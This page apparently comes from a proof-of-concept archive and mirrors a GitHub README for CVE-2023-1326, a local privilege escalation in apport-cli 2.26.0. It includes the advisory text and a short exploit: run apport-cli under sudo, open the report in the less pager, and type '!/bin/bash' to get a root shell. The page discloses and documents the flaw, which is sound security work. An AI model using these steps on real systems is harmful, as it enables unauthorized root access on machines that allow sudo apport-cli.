Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-1326 PoC — local privilege escalation in apport-cli

Source
https://github.com/diego-tella/CVE-2023-1326-PoC
Associated Vulnerability
Title:local privilege escalation in apport-cli (CVE-2023-1326)
Description:A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
Description
A proof of concept for CVE-2023–1326 in apport-cli 2.26.0
Readme
# CVE-2023-1326-PoC
A proof of concept for CVE-2023–1326 in apport-cli 2.26.0

This vulnerability is privilege escalation in apport-cli 2.26.0, similar to CVE-2023–26604, this vulnerability only works if assign in sudoers:

![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/983d4307-e3af-46db-8d76-5e3970f10225)

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege.

# PoC
```
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
```
![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/aa702438-28fe-434c-9ea5-6ed760f956bb)
![image](https://github.com/diego-tella/CVE-2023-1326-PoC/assets/70545257/fa2d0491-35be-465f-8e7b-35024faf8dcf)
File Snapshot

 [4.0K]  /data/pocs/f3d5f8b9bfd78971e3ad5fb79c00bca4fca09c0d
└── [ 979]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →